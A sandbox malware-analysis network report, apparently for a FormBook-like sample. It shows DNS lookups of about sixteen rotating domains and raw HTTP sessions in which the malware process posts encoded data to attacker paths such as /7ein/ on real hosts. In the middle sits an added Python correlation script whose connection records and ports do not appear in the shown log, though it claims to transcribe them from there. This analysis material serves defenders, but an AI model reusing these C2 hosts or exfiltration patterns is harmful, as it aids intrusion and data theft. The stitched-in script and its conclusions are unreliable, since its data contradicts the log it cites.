Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jul 16, 2024 07:21:44.155839920 CEST | 192.168.2.4 | 1.1.1.1 | 0x7bd7 | Standard query (0) | www.kundalisathi.com | A (IP address) | IN (0x0001) | false
Jul 16, 2024 07:21:59.723273039 CEST | 192.168.2.4 | 1.1.1.1 | 0x3a58 | Standard query (0) | www.quests-galxe.com | A (IP address) | IN (0x0001) | false
Jul 16, 2024 07:22:07.785259962 CEST | 192.168.2.4 | 1.1.1.1 | 0x6acb | Standard query (0) | www.quixaclienti.com | A (IP address) | IN (0x0001) | false
Jul 16, 2024 07:22:20.958830118 CEST | 192.168.2.4 | 1.1.1.1 | 0x9bf5 | Standard query (0) | www.mysticriverpath.com | A (IP address) | IN (0x0001) | false
Jul 16, 2024 07:22:34.493822098 CEST | 192.168.2.4 | 1.1.1.1 | 0xcb78 | Standard query (0) | www.bearclaw.bot | A (IP address) | IN (0x0001) | false
Jul 16, 2024 07:22:48.129128933 CEST | 192.168.2.4 | 1.1.1.1 | 0xfbf7 | Standard query (0) | www.focusonsocials.com | A (IP address) | IN (0x0001) | false
Jul 16, 2024 07:23:01.411633015 CEST | 192.168.2.4 | 1.1.1.1 | 0x2160 | Standard query (0) | www.onlandtoy.com | A (IP address) | IN (0x0001) | false
Jul 16, 2024 07:23:16.176028013 CEST | 192.168.2.4 | 1.1.1.1 | 0x9220 | Standard query (0) | www.quiluxx.top | A (IP address) | IN (0x0001) | false
Jul 16, 2024 07:23:30.067934036 CEST | 192.168.2.4 | 1.1.1.1 | 0x32f8 | Standard query (0) | www.bb58cc.com | A (IP address) | IN (0x0001) | false
Jul 16, 2024 07:23:43.849036932 CEST | 192.168.2.4 | 1.1.1.1 | 0x5b12 | Standard query (0) | www.bestandpure.com | A (IP address) | IN (0x0001) | false
Jul 16, 2024 07:23:57.287734032 CEST | 192.168.2.4 | 1.1.1.1 | 0x6f79 | Standard query (0) | www.rtpdewata4d-16.xyz | A (IP address) | IN (0x0001) | false
Jul 16, 2024 07:24:10.582833052 CEST | 192.168.2.4 | 1.1.1.1 | 0x4b12 | Standard query (0) | www.itsjojosiwas.com | A (IP address) | IN (0x0001) | false
Jul 16, 2024 07:24:24.979728937 CEST | 192.168.2.4 | 1.1.1.1 | 0xd665 | Standard query (0) | www.kera333.org | A (IP address) | IN (0x0001) | false
Jul 16, 2024 07:24:38.504750013 CEST | 192.168.2.4 | 1.1.1.1 | 0xeb70 | Standard query (0) | www.lmsforsme.com | A (IP address) | IN (0x0001) | false
Jul 16, 2024 07:24:51.770481110 CEST | 192.168.2.4 | 1.1.1.1 | 0xbdf3 | Standard query (0) | www.3333711m14.shop | A (IP address) | IN (0x0001) | false
Jul 16, 2024 07:25:05.817091942 CEST | 192.168.2.4 | 1.1.1.1 | 0xd520 | Standard query (0) | www.iitaccounting.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jul 16, 2024 07:21:44.171042919 CEST | 1.1.1.1 | 192.168.2.4 | 0x7bd7 | No error (0) | www.kundalisathi.com | kundalisathi.com |  | CNAME (Canonical name) | IN (0x0001) | false
Jul 16, 2024 07:21:44.171042919 CEST | 1.1.1.1 | 192.168.2.4 | 0x7bd7 | No error (0) | kundalisathi.com |  | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Jul 16, 2024 07:21:44.171042919 CEST | 1.1.1.1 | 192.168.2.4 | 0x7bd7 | No error (0) | kundalisathi.com |  | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Jul 16, 2024 07:21:59.732860088 CEST | 1.1.1.1 | 192.168.2.4 | 0x3a58 | Name error (3) | www.quests-galxe.com | none | none | A (IP address) | IN (0x0001) | false
Jul 16, 2024 07:22:07.798978090 CEST | 1.1.1.1 | 192.168.2.4 | 0x6acb | No error (0) | www.quixaclienti.com | quixaclienti.com |  | CNAME (Canonical name) | IN (0x0001) | false
Jul 16, 2024 07:22:07.798978090 CEST | 1.1.1.1 | 192.168.2.4 | 0x6acb | No error (0) | quixaclienti.com |  | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Jul 16, 2024 07:22:07.798978090 CEST | 1.1.1.1 | 192.168.2.4 | 0x6acb | No error (0) | quixaclienti.com |  | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Jul 16, 2024 07:22:21.253191948 CEST | 1.1.1.1 | 192.168.2.4 | 0x9bf5 | No error (0) | www.mysticriverpath.com | mysticriverpath.com |  | CNAME (Canonical name) | IN (0x0001) | false
Jul 16, 2024 07:22:21.253191948 CEST | 1.1.1.1 | 192.168.2.4 | 0x9bf5 | No error (0) | mysticriverpath.com |  | 216.194.173.237 | A (IP address) | IN (0x0001) | false
Jul 16, 2024 07:22:34.507065058 CEST | 1.1.1.1 | 192.168.2.4 | 0xcb78 | No error (0) | www.bearclaw.bot | bearclaw.bot |  | CNAME (Canonical name) | IN (0x0001) | false
Jul 16, 2024 07:22:34.507065058 CEST | 1.1.1.1 | 192.168.2.4 | 0xcb78 | No error (0) | bearclaw.bot |  | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Jul 16, 2024 07:22:34.507065058 CEST | 1.1.1.1 | 192.168.2.4 | 0xcb78 | No error (0) | bearclaw.bot |  | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Jul 16, 2024 07:22:48.144511938 CEST | 1.1.1.1 | 192.168.2.4 | 0xfbf7 | No error (0) | www.focusonsocials.com |  | 212.227.172.254 | A (IP address) | IN (0x0001) | false
Jul 16, 2024 07:23:02.061860085 CEST | 1.1.1.1 | 192.168.2.4 | 0x2160 | No error (0) | www.onlandtoy.com |  | 43.157.128.107 | A (IP address) | IN (0x0001) | false
Jul 16, 2024 07:23:16.837920904 CEST | 1.1.1.1 | 192.168.2.4 | 0x9220 | No error (0) | www.quiluxx.top |  | 203.161.41.205 | A (IP address) | IN (0x0001) | false
Jul 16, 2024 07:23:30.101463079 CEST | 1.1.1.1 | 192.168.2.4 | 0x32f8 | No error (0) | www.bb58cc.com |  | 103.176.91.154 | A (IP address) | IN (0x0001) | false
Jul 16, 2024 07:23:43.951368093 CEST | 1.1.1.1 | 192.168.2.4 | 0x5b12 | No error (0) | www.bestandpure.com |  | 3.33.244.179 | A (IP address) | IN (0x0001) | false
Jul 16, 2024 07:23:57.302839041 CEST | 1.1.1.1 | 192.168.2.4 | 0x6f79 | No error (0) | www.rtpdewata4d-16.xyz |  | 104.21.89.46 | A (IP address) | IN (0x0001) | false
Jul 16, 2024 07:23:57.302839041 CEST | 1.1.1.1 | 192.168.2.4 | 0x6f79 | No error (0) | www.rtpdewata4d-16.xyz |  | 172.67.156.115 | A (IP address) | IN (0x0001) | false
Jul 16, 2024 07:24:10.600626945 CEST | 1.1.1.1 | 192.168.2.4 | 0x4b12 | No error (0) | www.itsjojosiwas.com |  | 172.67.196.1 | A (IP address) | IN (0x0001) | false
Jul 16, 2024 07:24:10.600626945 CEST | 1.1.1.1 | 192.168.2.4 | 0x4b12 | No error (0) | www.itsjojosiwas.com |  | 104.21.21.24 | A (IP address) | IN (0x0001) | false
Jul 16, 2024 07:24:25.417280912 CEST | 1.1.1.1 | 192.168.2.4 | 0xd665 | No error (0) | www.kera333.org | kera333.org |  | CNAME (Canonical name) | IN (0x0001) | false
Jul 16, 2024 07:24:25.417280912 CEST | 1.1.1.1 | 192.168.2.4 | 0xd665 | No error (0) | kera333.org |  | 64.46.102.70 | A (IP address) | IN (0x0001) | false
Jul 16, 2024 07:24:38.540661097 CEST | 1.1.1.1 | 192.168.2.4 | 0xeb70 | No error (0) | www.lmsforsme.com | lmsforsme.com |  | CNAME (Canonical name) | IN (0x0001) | false
Jul 16, 2024 07:24:38.540661097 CEST | 1.1.1.1 | 192.168.2.4 | 0xeb70 | No error (0) | lmsforsme.com |  | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Jul 16, 2024 07:24:38.540661097 CEST | 1.1.1.1 | 192.168.2.4 | 0xeb70 | No error (0) | lmsforsme.com |  | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Jul 16, 2024 07:24:52.184094906 CEST | 1.1.1.1 | 192.168.2.4 | 0xbdf3 | No error (0) | www.3333711m14.shop | nbq.ssywan.com |  | CNAME (Canonical name) | IN (0x0001) | false
Jul 16, 2024 07:24:52.184094906 CEST | 1.1.1.1 | 192.168.2.4 | 0xbdf3 | No error (0) | nbq.ssywan.com |  | 23.105.215.248 | A (IP address) | IN (0x0001) | false
Jul 16, 2024 07:25:05.827225924 CEST | 1.1.1.1 | 192.168.2.4 | 0xd520 | No error (0) | www.iitaccounting.com | iitaccounting.com |  | CNAME (Canonical name) | IN (0x0001) | false
Jul 16, 2024 07:25:05.827225924 CEST | 1.1.1.1 | 192.168.2.4 | 0xd520 | No error (0) | iitaccounting.com |  | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Jul 16, 2024 07:25:05.827225924 CEST | 1.1.1.1 | 192.168.2.4 | 0xd520 | No error (0) | iitaccounting.com |  | 15.197.148.33 | A (IP address) | IN (0x0001) | false
                            • www.kundalisathi.com
                            • www.quixaclienti.com
                            • www.mysticriverpath.com
                            • www.bearclaw.bot
                            • www.focusonsocials.com
                            • www.onlandtoy.com
                            • www.quiluxx.top
                            • www.bb58cc.com
                            • www.bestandpure.com
                            • www.rtpdewata4d-16.xyz
                            • www.itsjojosiwas.com
                            • www.kera333.org
                            • www.lmsforsme.com
                            • www.3333711m14.shop
                            • www.iitaccounting.com
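The DNS and TCP tables above only make sense together: the sample resolves one domain roughly every 13 seconds and then opens a short burst of connections to whatever that name resolved to, and five of the names share the same pair of addresses (3.33.130.190 and 15.197.148.33), so a destination IP alone does not say which domain a connection belongs to. The script below is an added example, not part of the Joe Sandbox report: it transcribes the answer timestamps, CNAME/A records and the first client packet of each connection from the tables above, follows the CNAME chains, attributes every connection to the most recent answer that carried its destination IP, and reports the lookup cadence and the shared addresses. The remark that FormBook normally mixes its real C2 with unrelated domains is general knowledge about the family, stated as an assumption; the report does not say which of these domains, if any, is the live C2.

```python
"""Correlate the DNS answers and TCP connections above into per-domain activity.

Added example, not part of the Joe Sandbox report. All records below are
transcribed from the report's own tables (answer timestamps, names, CNAME and
A records, first client packet of each TCP connection). Which domain is the
live C2 is not stated by the report and is not decided here.
"""
from datetime import datetime


def ts(clock):
    """Parse the report's clock field ("07:24:38.540661097"); ns are truncated to us."""
    return datetime.strptime("2024-07-16 " + clock[:15], "%Y-%m-%d %H:%M:%S.%f")


# Answer timestamp and queried name, in report order (www.quests-galxe.com was NXDOMAIN).
ANSWERS = [
    ("07:21:44.171042919", "www.kundalisathi.com"), ("07:21:59.732860088", "www.quests-galxe.com"),
    ("07:22:07.798978090", "www.quixaclienti.com"), ("07:22:21.253191948", "www.mysticriverpath.com"),
    ("07:22:34.507065058", "www.bearclaw.bot"), ("07:22:48.144511938", "www.focusonsocials.com"),
    ("07:23:02.061860085", "www.onlandtoy.com"), ("07:23:16.837920904", "www.quiluxx.top"),
    ("07:23:30.101463079", "www.bb58cc.com"), ("07:23:43.951368093", "www.bestandpure.com"),
    ("07:23:57.302839041", "www.rtpdewata4d-16.xyz"), ("07:24:10.600626945", "www.itsjojosiwas.com"),
    ("07:24:25.417280912", "www.kera333.org"), ("07:24:38.540661097", "www.lmsforsme.com"),
    ("07:24:52.184094906", "www.3333711m14.shop"), ("07:25:05.827225924", "www.iitaccounting.com"),
]

# Owner name -> answer records (type, rdata), as listed in the answers table.
RECORDS = {
    "www.kundalisathi.com": [("CNAME", "kundalisathi.com")],
    "kundalisathi.com": [("A", "3.33.130.190"), ("A", "15.197.148.33")],
    "www.quixaclienti.com": [("CNAME", "quixaclienti.com")],
    "quixaclienti.com": [("A", "3.33.130.190"), ("A", "15.197.148.33")],
    "www.mysticriverpath.com": [("CNAME", "mysticriverpath.com")],
    "mysticriverpath.com": [("A", "216.194.173.237")],
    "www.bearclaw.bot": [("CNAME", "bearclaw.bot")],
    "bearclaw.bot": [("A", "3.33.130.190"), ("A", "15.197.148.33")],
    "www.focusonsocials.com": [("A", "212.227.172.254")],
    "www.onlandtoy.com": [("A", "43.157.128.107")],
    "www.quiluxx.top": [("A", "203.161.41.205")],
    "www.bb58cc.com": [("A", "103.176.91.154")],
    "www.bestandpure.com": [("A", "3.33.244.179")],
    "www.rtpdewata4d-16.xyz": [("A", "104.21.89.46"), ("A", "172.67.156.115")],
    "www.itsjojosiwas.com": [("A", "172.67.196.1"), ("A", "104.21.21.24")],
    "www.kera333.org": [("CNAME", "kera333.org")],
    "kera333.org": [("A", "64.46.102.70")],
    "www.lmsforsme.com": [("CNAME", "lmsforsme.com")],
    "lmsforsme.com": [("A", "3.33.130.190"), ("A", "15.197.148.33")],
    "www.3333711m14.shop": [("CNAME", "nbq.ssywan.com")],
    "nbq.ssywan.com": [("A", "23.105.215.248")],
    "www.iitaccounting.com": [("CNAME", "iitaccounting.com")],
    "iitaccounting.com": [("A", "3.33.130.190"), ("A", "15.197.148.33")],
}

# First client->server packet of each TCP connection in the table above: (time, src port, dst IP).
CONNECTIONS = [
    ("07:24:25.423715115", 49778, "64.46.102.70"), ("07:24:27.958405018", 49779, "64.46.102.70"),
    ("07:24:30.504514933", 49780, "64.46.102.70"), ("07:24:33.035734892", 49781, "64.46.102.70"),
    ("07:24:38.543243885", 49782, "3.33.130.190"), ("07:24:41.082190990", 49783, "3.33.130.190"),
    ("07:24:43.754091024", 49784, "3.33.130.190"), ("07:24:46.285514116", 49785, "3.33.130.190"),
    ("07:24:52.186522961", 49786, "23.105.215.248"), ("07:24:54.723507881", 49787, "23.105.215.248"),
    ("07:24:57.255846024", 49788, "23.105.215.248"), ("07:24:59.786637068", 49789, "23.105.215.248"),
    ("07:25:05.829782963", 49790, "3.33.130.190"),
]


def resolve(name, depth=0):
    """Follow CNAME chains and return the set of A records a query for `name` yielded."""
    addrs = set()
    for rtype, rdata in RECORDS.get(name, []):
        if rtype == "A":
            addrs.add(rdata)
        elif rtype == "CNAME" and depth < 8:  # depth guard against a CNAME loop
            addrs |= resolve(rdata, depth + 1)
    return addrs


def attribute(connections=CONNECTIONS, answers=ANSWERS):
    """Map source port -> domain: the latest answer before the SYN that contained the dst IP."""
    resolved = [(ts(t), name, resolve(name)) for t, name in answers]
    out = {}
    for t, sport, dst in connections:
        when = ts(t)
        names = [name for at, name, addrs in resolved if at <= when and dst in addrs]
        out[sport] = names[-1] if names else None
    return out


def lookup_intervals(answers=ANSWERS):
    """Seconds between successive DNS answers, i.e. the sample's domain-rotation cadence."""
    times = [ts(t) for t, _ in answers]
    return [round((b - a).total_seconds(), 1) for a, b in zip(times, times[1:])]


def shared_ips():
    """Addresses that more than one queried domain resolved to, with the domains."""
    owners = {}
    for _, name in ANSWERS:
        for ip in resolve(name):
            owners.setdefault(ip, set()).add(name)
    return {ip: sorted(names) for ip, names in owners.items() if len(names) > 1}


if __name__ == "__main__":
    for sport, domain in attribute().items():
        print(sport, "->", domain)
    print("intervals:", lookup_intervals())
    print("shared:", shared_ips())
```

Running it attributes ports 49782 through 49785 to www.lmsforsme.com and 49790 to www.iitaccounting.com even though all five connections go to 3.33.130.190, and shows the same four-connections-per-domain burst for www.kera333.org and www.3333711m14.shop. The one short interval (about 8 s after www.quests-galxe.com) is the NXDOMAIN case: with nothing to connect to, the sample moved on to the next name early. Addresses shared by several unrelated domains (here 3.33.130.190 and 15.197.148.33, which five names in the list resolve to) are the ones to treat with suspicion as parking or redirect infrastructure rather than as the C2 itself; that is an assumption to confirm against the HTTP replies, not something this table proves.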
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49736 | 3.33.130.190 | 80 | 1668 | C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe
Timestamp | Bytes transferred | Direction | Data
Jul 16, 2024 07:21:44.187586069 CEST | 370 | OUT | GET /esfu/?UbV=gh5yKdvhconYF1IQdW8vdxSZdz4d9+SHwgQXx3mIDLUkg8HVZvA84ZxaBoLmPIr804qY2VBHslVt+Qh3tR7ZY1ctik1AAurafdW52ChWUJGqDg8qNhYLIWg=&Y4gp=mlltcrRxcL HTTP/1.1
                            Accept: */*
                            Accept-Language: en-US
                            Connection: close
                            Host: www.kundalisathi.com
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
Jul 16, 2024 07:21:44.670972109 CEST | 395 | IN | HTTP/1.1 200 OK
                            Server: openresty
                            Date: Tue, 16 Jul 2024 05:21:44 GMT
                            Content-Type: text/html
                            Content-Length: 255
                            Connection: close
                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 55 62 56 3d 67 68 35 79 4b 64 76 68 63 6f 6e 59 46 31 49 51 64 57 38 76 64 78 53 5a 64 7a 34 64 39 2b 53 48 77 67 51 58 78 33 6d 49 44 4c 55 6b 67 38 48 56 5a 76 41 38 34 5a 78 61 42 6f 4c 6d 50 49 72 38 30 34 71 59 32 56 42 48 73 6c 56 74 2b 51 68 33 74 52 37 5a 59 31 63 74 69 6b 31 41 41 75 72 61 66 64 57 35 32 43 68 57 55 4a 47 71 44 67 38 71 4e 68 59 4c 49 57 67 3d 26 59 34 67 70 3d 6d 6c 6c 74 63 72 52 78 63 4c 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?UbV=gh5yKdvhconYF1IQdW8vdxSZdz4d9+SHwgQXx3mIDLUkg8HVZvA84ZxaBoLmPIr804qY2VBHslVt+Qh3tR7ZY1ctik1AAurafdW52ChWUJGqDg8qNhYLIWg=&Y4gp=mlltcrRxcL"}</script></head></html>


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            1 | 192.168.2.4 | 49738 | 3.33.130.190 | 80 | 1668 | C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe
                            Timestamp | Bytes transferred | Direction | Data
                            Jul 16, 2024 07:22:07.807704926 CEST | 643 | OUT | POST /7ein/ HTTP/1.1
                            Accept: */*
                            Accept-Language: en-US
                            Accept-Encoding: gzip, deflate, br
                            Connection: close
                            Content-Type: application/x-www-form-urlencoded
                            Content-Length: 200
                            Cache-Control: max-age=0
                            Host: www.quixaclienti.com
                            Origin: http://www.quixaclienti.com
                            Referer: http://www.quixaclienti.com/7ein/
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                            Data Raw: 55 62 56 3d 79 67 4a 6f 6c 33 43 63 36 37 59 61 7a 57 50 48 4b 48 47 73 48 62 74 58 45 66 46 76 4f 55 49 72 66 68 30 66 6f 4f 45 45 45 32 46 62 64 43 6b 56 56 4a 4b 5a 31 41 74 34 4d 49 38 70 49 4b 4c 71 49 66 58 43 65 44 46 72 44 59 76 62 68 4c 6c 71 4d 74 45 33 31 61 68 39 63 4d 75 70 4c 54 75 64 38 49 76 43 31 6d 70 66 4f 61 46 49 61 46 4b 2f 44 4f 6a 31 79 78 4e 6f 33 69 6e 6a 6f 51 55 63 62 2b 6e 68 34 37 4f 76 30 44 43 4e 38 4f 45 72 78 63 6a 44 78 32 63 33 63 72 49 4b 79 6e 58 48 41 67 37 69 42 65 55 45 6a 30 48 42 65 67 4b 38 53 68 68 2b 53 4b 64 42 37 59 4a 68 31 39 36 42 43 41 3d 3d
                            Data Ascii: UbV=ygJol3Cc67YazWPHKHGsHbtXEfFvOUIrfh0foOEEE2FbdCkVVJKZ1At4MI8pIKLqIfXCeDFrDYvbhLlqMtE31ah9cMupLTud8IvC1mpfOaFIaFK/DOj1yxNo3injoQUcb+nh47Ov0DCN8OErxcjDx2c3crIKynXHAg7iBeUEj0HBegK8Shh+SKdB7YJh196BCA==


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            2 | 192.168.2.4 | 49739 | 3.33.130.190 | 80 | 1668 | C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe
                            Timestamp | Bytes transferred | Direction | Data
                            Jul 16, 2024 07:22:10.400645971 CEST | 663 | OUT | POST /7ein/ HTTP/1.1
                            Accept: */*
                            Accept-Language: en-US
                            Accept-Encoding: gzip, deflate, br
                            Connection: close
                            Content-Type: application/x-www-form-urlencoded
                            Content-Length: 220
                            Cache-Control: max-age=0
                            Host: www.quixaclienti.com
                            Origin: http://www.quixaclienti.com
                            Referer: http://www.quixaclienti.com/7ein/
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                            Data Raw: 55 62 56 3d 79 67 4a 6f 6c 33 43 63 36 37 59 61 79 32 54 48 5a 32 47 73 41 37 74 59 4c 2f 46 76 48 30 49 76 66 68 77 66 6f 50 42 66 48 43 70 62 63 6a 55 56 55 49 4b 5a 30 41 74 34 45 6f 38 67 46 71 4c 78 49 66 72 67 65 42 52 72 44 59 4c 62 68 4f 5a 71 4d 64 34 34 30 4b 68 2f 57 63 75 72 47 7a 75 64 38 49 76 43 31 6d 39 6c 4f 61 64 49 62 32 53 2f 46 72 50 32 30 42 4e 76 6a 79 6e 6a 35 67 55 41 62 2b 6d 30 34 36 69 57 30 42 71 4e 38 50 30 72 78 4a 44 41 72 6d 64 38 54 4c 4a 69 35 6e 32 63 50 53 53 77 49 4d 4a 67 6a 51 47 6b 66 6d 62 6d 44 51 41 70 41 4b 35 79 6d 66 41 56 34 2b 48 49 5a 41 45 78 76 54 64 35 46 64 43 52 5a 59 4b 7a 47 77 33 52 59 49 6b 3d
                            Data Ascii: UbV=ygJol3Cc67Yay2THZ2GsA7tYL/FvH0IvfhwfoPBfHCpbcjUVUIKZ0At4Eo8gFqLxIfrgeBRrDYLbhOZqMd440Kh/WcurGzud8IvC1m9lOadIb2S/FrP20BNvjynj5gUAb+m046iW0BqN8P0rxJDArmd8TLJi5n2cPSSwIMJgjQGkfmbmDQApAK5ymfAV4+HIZAExvTd5FdCRZYKzGw3RYIk=


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            3 | 192.168.2.4 | 49740 | 3.33.130.190 | 80 | 1668 | C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe
                            Timestamp | Bytes transferred | Direction | Data
                            Jul 16, 2024 07:22:12.935842991 CEST | 10745 | OUT | POST /7ein/ HTTP/1.1
                            Accept: */*
                            Accept-Language: en-US
                            Accept-Encoding: gzip, deflate, br
                            Connection: close
                            Content-Type: application/x-www-form-urlencoded
                            Content-Length: 10300
                            Cache-Control: max-age=0
                            Host: www.quixaclienti.com
                            Origin: http://www.quixaclienti.com
                            Referer: http://www.quixaclienti.com/7ein/
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                            Data Raw: 55 62 56 3d 79 67 4a 6f 6c 33 43 63 36 37 59 61 79 32 54 48 5a 32 47 73 41 37 74 59 4c 2f 46 76 48 30 49 76 66 68 77 66 6f 50 42 66 48 44 39 62 63 56 49 56 56 72 69 5a 6d 51 74 34 4b 49 38 74 46 71 4b 6a 49 62 2f 6b 65 42 4e 37 44 61 44 62 68 6f 4e 71 45 50 63 34 39 4b 68 2f 59 4d 75 71 4c 54 75 49 38 4d 4c 4f 31 6d 74 6c 4f 61 64 49 62 77 2b 2f 43 2b 6a 32 32 42 4e 6f 33 69 6e 52 6f 51 55 6b 62 2b 2f 50 34 36 6d 47 33 77 4b 4e 38 76 6b 72 30 36 72 41 67 6d 64 2b 57 4c 4a 36 35 6e 36 35 50 53 4f 43 49 4e 38 46 6a 58 32 6b 65 58 71 5a 65 78 52 78 44 35 46 4a 32 73 67 31 32 2b 54 6b 52 68 35 46 2f 79 4a 78 65 38 33 79 56 61 66 41 63 67 76 36 43 38 61 54 6d 51 30 77 75 36 53 69 31 50 35 52 36 49 78 69 51 4e 30 4e 63 43 72 73 61 4d 32 76 53 4e 76 76 78 2b 6a 6e 4a 72 64 43 75 4d 76 73 4c 49 65 37 69 54 6b 32 6f 6a 5a 31 72 51 62 43 6c 7a 4b 45 76 42 6a 57 77 6a 77 61 67 75 34 74 2f 59 46 6f 5a 38 6f 6f 32 46 72 68 74 61 34 58 6b 41 55 2b 79 54 52 54 79 67 4b 4d 30 6d 55 37 63 37 59 7a 70 32 34 36 42 70 [TRUNCATED]
                            Data Ascii: UbV= [TRUNCATED]


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            4 | 192.168.2.4 | 49741 | 3.33.130.190 | 80 | 1668 | C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe
                            Timestamp | Bytes transferred | Direction | Data
                            Jul 16, 2024 07:22:15.465100050 CEST | 370 | OUT | GET /7ein/?UbV=/ihImCX+1rYe7Vz3Kk/QKb9OP755DF44RGQCiMJXBGw4by48MaukmXBDJs8Bc6H1E8vVem8tLNCMtrUfB/Ur9IMKSu+lAmmznonV11JSP5QMQGeoH+bhzTc=&Y4gp=mlltcrRxcL HTTP/1.1
                            Accept: */*
                            Accept-Language: en-US
                            Connection: close
                            Host: www.quixaclienti.com
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                            Jul 16, 2024 07:22:15.940253973 CEST | 395 | IN | HTTP/1.1 200 OK
                            Server: openresty
                            Date: Tue, 16 Jul 2024 05:22:15 GMT
                            Content-Type: text/html
                            Content-Length: 255
                            Connection: close
                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 55 62 56 3d 2f 69 68 49 6d 43 58 2b 31 72 59 65 37 56 7a 33 4b 6b 2f 51 4b 62 39 4f 50 37 35 35 44 46 34 34 52 47 51 43 69 4d 4a 58 42 47 77 34 62 79 34 38 4d 61 75 6b 6d 58 42 44 4a 73 38 42 63 36 48 31 45 38 76 56 65 6d 38 74 4c 4e 43 4d 74 72 55 66 42 2f 55 72 39 49 4d 4b 53 75 2b 6c 41 6d 6d 7a 6e 6f 6e 56 31 31 4a 53 50 35 51 4d 51 47 65 6f 48 2b 62 68 7a 54 63 3d 26 59 34 67 70 3d 6d 6c 6c 74 63 72 52 78 63 4c 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?UbV=/ihImCX+1rYe7Vz3Kk/QKb9OP755DF44RGQCiMJXBGw4by48MaukmXBDJs8Bc6H1E8vVem8tLNCMtrUfB/Ur9IMKSu+lAmmznonV11JSP5QMQGeoH+bhzTc=&Y4gp=mlltcrRxcL"}</script></head></html>


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            5 | 192.168.2.4 | 49742 | 216.194.173.237 | 80 | 1668 | C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe
                            Timestamp | Bytes transferred | Direction | Data
                            Jul 16, 2024 07:22:21.268296003 CEST | 652 | OUT | POST /6vu8/ HTTP/1.1
                            Accept: */*
                            Accept-Language: en-US
                            Accept-Encoding: gzip, deflate, br
                            Connection: close
                            Content-Type: application/x-www-form-urlencoded
                            Content-Length: 200
                            Cache-Control: max-age=0
                            Host: www.mysticriverpath.com
                            Origin: http://www.mysticriverpath.com
                            Referer: http://www.mysticriverpath.com/6vu8/
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
